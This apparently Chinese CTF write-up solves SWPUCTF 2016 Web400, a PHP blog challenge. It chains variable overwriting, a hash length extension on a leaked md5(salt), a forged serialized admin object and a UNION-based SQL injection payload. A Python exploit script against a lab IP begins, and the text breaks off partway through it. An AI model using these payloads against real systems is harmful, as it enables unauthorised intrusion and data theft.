<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon.jpg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14.0/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/pace-js@1.0.2/themes/blue/pace-theme-minimal.css">
  <script src="//cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"tiaonmmn.github.io","root":"/","scheme":"Gemini","version":"8.0.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":true,"color":"#b46eba","save":"auto"},"fancybox":true,"mediumzoom":true,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":true,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":true}};
  </script>

  <meta name="description" content="SWPUCTF 2016的Web400。 是个PHP的博客系统，扫目录发现了一个web.zip。好了，源码审计。 先看一下index.php，发现实现的注册与登录都没有进行任何SQL过滤，但不知道有什么用。common.php是公共引用的文件，其中有我们十分感兴趣的代码。">
<meta property="og:type" content="article">
<meta property="og:title" content="SWPUCTF-2016-Web400">
<meta property="og:url" content="http://tiaonmmn.github.io/2019/09/13/SWPUCTF-2016-Web400/index.html">
<meta property="og:site_name" content="Tiaonmmn&#39;s Littile House">
<meta property="og:description" content="SWPUCTF 2016的Web400。 是个PHP的博客系统，扫目录发现了一个web.zip。好了，源码审计。 先看一下index.php，发现实现的注册与登录都没有进行任何SQL过滤，但不知道有什么用。common.php是公共引用的文件，其中有我们十分感兴趣的代码。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2019-09-13T09:11:40.000Z">
<meta property="article:modified_time" content="2019-12-10T12:15:12.675Z">
<meta property="article:author" content="Tiaonmmn.ZMZ">
<meta property="article:tag" content="Unserialize">
<meta property="article:tag" content="PHP">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="SQL注入">
<meta property="article:tag" content="哈希扩展攻击">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://tiaonmmn.github.io/2019/09/13/SWPUCTF-2016-Web400/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>SWPUCTF-2016-Web400 | Tiaonmmn's Littile House</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

<link rel="stylesheet" href="/assets/css/APlayer.min.css" class="aplayer-style-marker">
<script src="/assets/js/APlayer.min.js" class="aplayer-script-marker"></script>
<script src="/assets/js/Meting.min.js" class="meting-script-marker"></script>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Tiaonmmn's Littile House</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-overview-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <section class="post-toc-wrap sidebar-panel">
      </section>
      <!--/noindex-->

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Tiaonmmn.ZMZ"
      src="/avatar.jpeg">
  <p class="site-author-name" itemprop="name">Tiaonmmn.ZMZ</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">81</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">95</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


<!-- CloudCalendar -->
<div class="widget-wrap" style="width: 90%;margin-left: auto;margin-right: auto; opacity: 0.97;">
	<div class="widget" id="CloudCalendar"></div>
</div><!-- CloudCalendar -->
<div class="widget-wrap" style="width: 90%;margin-left: auto;margin-right: auto; opacity: 0.97;">
	<div class="widget" id="CloudCalendar"></div>
</div>
      </section>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://tiaonmmn.github.io/2019/09/13/SWPUCTF-2016-Web400/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/avatar.jpeg">
      <meta itemprop="name" content="Tiaonmmn.ZMZ">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Tiaonmmn's Littile House">
    </span>

    
    
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SWPUCTF-2016-Web400
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2019-09-13 17:11:40" itemprop="dateCreated datePublished" datetime="2019-09-13T17:11:40+08:00">2019-09-13</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2019-12-10 20:15:12" itemprop="dateModified" datetime="2019-12-10T20:15:12+08:00">2019-12-10</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Writeups/" itemprop="url" rel="index"><span itemprop="name">Writeups</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
  
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2019/09/13/SWPUCTF-2016-Web400/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2019/09/13/SWPUCTF-2016-Web400/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
      </div>
      <div class="post-meta">
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>7.8k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>7 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><script class="meting-secondary-script-marker" src="\assets\js\Meting.min.js"></script><p>SWPUCTF 2016的Web400。 是个PHP的博客系统，扫目录发现了一个web.zip。好了，源码审计。 先看一下index.php，发现实现的注册与登录都没有进行任何SQL过滤，但不知道有什么用。common.php是公共引用的文件，其中有我们十分感兴趣的代码。 <a id="more"></a> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span> (<span class="keyword">Array</span>(<span class="string">&quot;_POST&quot;</span>, <span class="string">&quot;_GET&quot;</span>, <span class="string">&quot;_COOKIE&quot;</span>) <span class="keyword">as</span> $key) &#123;</span><br><span class="line">    <span class="keyword">foreach</span> ($$key <span class="keyword">as</span> $k =&gt; $v) &#123;</span><br><span class="line">        <span class="keyword">if</span> (is_array($v)) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;hello,hacker!&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            $k[<span class="number">0</span>] != <span class="string">&#x27;_&#x27;</span> ? $$k = addslashes($v) : $$k = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure> PHP中$$代表以某一变量名作为变量名的变量，因此foreach循环中的$$key as $k =&gt; <span class="math inline">\(v，等同于将上面提到的Array(&quot;\_POST&quot;, &quot;\_GET&quot;, &quot;\_COOKIE&quot;)这几个数组分别拆成\)</span>k和<span class="math inline">\(v，其中\)</span>k指“_POST”等数组内元素的名字，<span class="math inline">\(v指\)</span>k对应的值。如果<span class="math inline">\(v是个数组则die，如果我们传入`/?c[]=1`，就会die。不是数组的话就会将\)</span>k数组的第一项addslashes()，就是说我们传入<code>/?c="1"</code>，_GET数组的第一项就是c，那么实际上_GET['c']==_GET[0]的值是<code>\"1\"</code>。因此就有一个变量覆盖，我们可以任意对变量赋值。但是有个问题，这段代码在common.php中，其余所有文件是在文件头部include('common.php')的，我们的变量覆盖又只能控制数组的第一个变量，因此对于文件需要的传参，它实际上又会被覆盖掉，因此我们只能覆盖从未声明的变量。 然后在riji.php中我们有如下代码： <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ($_SESSION[<span class="string">&#x27;user&#x27;</span>]) &#123;</span><br><span class="line">    $username = $_SESSION[<span class="string">&#x27;user&#x27;</span>];</span><br><span class="line">    @mysql_conn();</span><br><span class="line">    $sql = <span class="string">&quot;select * from user where name=&#x27;$username&#x27;&quot;</span>;</span><br><span class="line">    $result = @mysql_fetch_array(mysql_query($sql));</span><br><span class="line">    mysql_close();</span><br><span class="line">    <span class="keyword">if</span> ($result[<span class="string">&#x27;userid&#x27;</span>]) &#123;</span><br><span class="line">        $id = intval($result[<span class="string">&#x27;userid&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure> 我们正常登录后<span class="math inline">\(\_SESSION[&#39;user&#39;]会赋值\)</span>username，但如果登陆后此时我们把数据库中<span class="math inline">\(username的记录删掉，那么if判断就会为false，\)</span>id没有被赋值，我们就可以控制了。 riji.php中还有一段代码： <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  @mysql_conn();</span><br><span class="line">  $sql1 = <span class="string">&quot;select * from msg where userid= $id order by id&quot;</span>;</span><br><span class="line">  $query = mysql_query($sql1);</span><br><span class="line">  $result1 = <span class="keyword">array</span>();</span><br><span class="line">  <span class="keyword">while</span> ($temp = mysql_fetch_assoc($query)) &#123;</span><br><span class="line">      $result1[] = $temp;</span><br><span class="line">  &#125;</span><br><span class="line">  mysql_close();</span><br><span class="line">  <span class="keyword">foreach</span> ($result1 <span class="keyword">as</span> $x =&gt; $o) &#123;</span><br><span class="line">      <span class="keyword">echo</span> display($o[<span class="string">&#x27;msg&#x27;</span>]);</span><br><span class="line">  &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure> <span class="math inline">\(id会直接带入查询，注意SQL语句中\)</span>id没有引号，那么我们传入<code>1' or 1=1</code>，全局addslashes()后变成<code>1\' or 1=1</code>，addslashes()对于SQL注入没有任何影响。虽然不知道SQL注入有什么用。 然后api.php声明了一个admin类，其中确实有删除用户的方法。该文件最后两行直接<span class="math inline">\(a=unserialize(base64_decode(\)</span>api))，然后do_method，<span class="math inline">\(a与\)</span>api都没有后赋值，可以变量覆盖。但是在del_user之前我们要先过了check，check中检查类的check变量是否等于MD5（用户注册时的salt+类data变量+用户名），然后还检查用户的role是否为1。在源码中给出的db.sql中我们发现admin用户的role为1，但是我们不知道其salt。 然后在forget.php中我们看到如下代码： <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (@$forget == <span class="number">1</span>) &#123;</span><br><span class="line"></span><br><span class="line">    @mysql_conn();</span><br><span class="line">    $sql = <span class="string">&quot;select * from user where name=&#x27;$username&#x27;&quot;</span>;</span><br><span class="line">    $result = @mysql_fetch_array(mysql_query($sql));</span><br><span class="line">    mysql_close();</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>($result)) &#123;</span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> ($result[<span class="string">&#x27;salt&#x27;</span>]) &#123;</span><br><span class="line">            $check = base64_encode(md5($result[<span class="string">&#x27;salt&#x27;</span>]));</span><br><span class="line">            $name = $result[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">            header(<span class="string">&quot;Location:/repass.php?username=$name&amp;check=$check&amp;mibao=$mibao&amp;pass=$pass&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span>(<span class="string">&quot;&lt;script&gt;alert(&#x27;Get salt Worng?&#x27;)&lt;/script&gt;&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span>(<span class="string">&quot;&lt;script&gt;alert(&#x27;Please check!!?&#x27;)&lt;/script&gt;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure> 我们输入用户名，查到有此用户后会带出来md5(salt)。 好了，现在我们已知md5(salt)，类data与用户名（admin）可控，要求md5(salt+data+"admin")，这就是哈希扩展攻击了。哈希扩展攻击参考<a target="_blank" rel="noopener" href="https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks">这个</a>，简单来说就是针对SHA、MD5这类Hash算法，如果我们不知道特定密文c，但是知道知道MD5/SHA(c+pad)与密文c的长度，其中pad我们可控，那么我们就可以求出MD5(salt+pad+m)，其中m为任意数据。 我们用<a target="_blank" rel="noopener" href="https://github.com/JoyChou93/md5-extension-attack">这个工具</a>，用于已知密文MD5，求MD5(密文+pad)的情况。 好了，可以开始反序列化了。 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">admin</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">var</span> $name=<span class="string">&quot;admin&quot;</span>;</span><br><span class="line">    <span class="keyword">var</span> $check=<span class="string">&quot;0f85487590dd2a3182389623cc8e3933&quot;</span>;</span><br><span class="line">    <span class="keyword">var</span> $data=<span class="string">&quot;admin\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00&quot;</span>;</span><br><span class="line">    <span class="keyword">var</span> $method=<span class="string">&quot;del_msg&quot;</span>;</span><br><span class="line">    <span class="keyword">var</span> $userid=<span class="number">2</span>;</span><br><span class="line">    <span class="keyword">var</span> $msgid;</span><br><span class="line"><span class="comment">//&gt;&gt;&gt; hashpumpy.hashpump(&#x27;ceb20772e0c9d240c75eb26b0e37abee&#x27;,&#x27;admin&#x27;,&#x27;admin&#x27;,16)</span></span><br><span class="line"><span class="comment">//(&#x27;0f85487590dd2a3182389623cc8e3933&#x27;, b&#x27;admin\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa8\x00\x00\x00\x00\x00\x00\x00admin&#x27;)</span></span><br><span class="line">&#125;</span><br><span class="line">$a=serialize(<span class="keyword">new</span> admin());</span><br><span class="line"><span class="keyword">echo</span> base64_encode($a);</span><br></pre></td></tr></table></figure> userid置为2的原因是我们注册新用户的时候userid已经为2了，可以从Cookie中看到。 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (@$login == <span class="number">1</span>) &#123;</span><br><span class="line"></span><br><span class="line">    @mysql_conn();</span><br><span class="line">    $sql = <span class="string">&quot;select * from user where name=&#x27;$username&#x27;&quot;</span>;</span><br><span class="line">    $result = @mysql_fetch_array(mysql_query($sql));</span><br><span class="line">    mysql_close();</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>($result)) &#123;</span><br><span class="line">    </span><br><span class="line">        <span class="keyword">if</span> ($result[<span class="string">&#x27;passwd&#x27;</span>] == md5($password)) &#123;</span><br><span class="line">            $user_cookie = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">            $user_cookie .= $result[<span class="string">&#x27;userid&#x27;</span>];</span><br><span class="line">            $user_cookie .= $result[<span class="string">&#x27;name&#x27;</span>];</span><br><span class="line">            $user_cookie .= $result[<span class="string">&#x27;salt&#x27;</span>];</span><br><span class="line">            $cookies = base64_encode($user_cookie);</span><br><span class="line">            <span class="comment">//$cookies = $user_cookie;</span></span><br><span class="line">            setcookie(<span class="string">&quot;user&quot;</span>, $cookies, time() + <span class="number">60</span>, <span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">            $_SESSION[<span class="string">&#x27;login&#x27;</span>] = <span class="number">1</span>;</span><br><span class="line">            $_SESSION[<span class="string">&#x27;user&#x27;</span>] = $username;</span><br><span class="line">            header(<span class="string">&#x27;Location:/riji.php&#x27;</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">echo</span>(<span class="string">&quot;&lt;script&gt;alert(&#x27;Password Worng?&#x27;)&lt;/script&gt;&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span>(<span class="string">&quot;&lt;script&gt;alert(&#x27;Username Worng?&#x27;)&lt;/script&gt;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure> 我们Base64解码一下就OK了。生成的结果传给api.php/?api=就行了，需要注意的是api.php在开头设置了$_SESSION['login']==1的判断，因此我们需要另外起一个窗口发api.php，然后我们返回最开始的登录页面，发现登录状态没有消失，这时SQL注入可以利用了，正常SQL注入流程，除引号外没有任何过滤。提交/riji.php?id=-1 union select 1,2,flag from flag就可以得到flag了。 PoC： <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64decode</span><br><span class="line"><span class="keyword">from</span> urllib.parse <span class="keyword">import</span> unquote, parse_qs</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">addr = <span class="string">&quot;http://192.168.1.4:5354/&quot;</span></span><br><span class="line">a = requests.session()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">register</span>(<span class="params">a: requests.Session</span>) -&gt; str:</span></span><br><span class="line">    username = <span class="string">&quot;&quot;</span>.join(random.sample(string.ascii_letters, <span class="number">6</span>))</span><br><span class="line">    b = a.post(addr + <span class="string">&quot;index.php&quot;</span>, data=&#123;</span><br><span class="line">        <span class="string">&quot;username&quot;</span>: username,</span><br><span class="line">        <span class="string">&quot;password&quot;</span>: <span class="string">&quot;test1&quot;</span>,</span><br><span class="line">        <span class="string">&quot;mibao&quot;</span>: <span class="string">&quot;test1&quot;</span>,</span><br><span class="line">        <span class="string">&quot;regi&quot;</span>: <span class="string">&quot;1&quot;</span></span><br><span class="line">    &#125;)</span><br><span class="line">    print(b.text)</span><br><span class="line">    print(<span class="string">&quot;Username is &quot;</span> + username)</span><br><span class="line">    <span class="keyword">return</span> username</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">login</span>(<span class="params">a: requests.Session, username: str</span>) -&gt; int:</span></span><br><span class="line">    b = a.post(addr + <span class="string">&quot;index.php&quot;</span>, data=&#123;</span><br><span class="line">        <span class="string">&quot;username&quot;</span>: username,</span><br><span class="line">        <span class="string">&quot;password&quot;</span>: <span class="string">&quot;test1&quot;</span>,</span><br><span class="line">        <span class="string">&quot;mibao&quot;</span>: <span class="string">&quot;test1&quot;</span>,</span><br><span class="line">        <span class="string">&quot;login&quot;</span>: <span class="string">&quot;1&quot;</span></span><br><span class="line">    &#125;)</span><br><span class="line">    print(b.text)</span><br><span class="line">    userid = (b64decode(unquote(a.cookies.get(<span class="string">&#x27;user&#x27;</span>)).encode())[</span><br><span class="line">              :b64decode(unquote(a.cookies.get(<span class="string">&#x27;user&#x27;</span>)).encode()).find(username.encode())])</span><br><span class="line">    <span 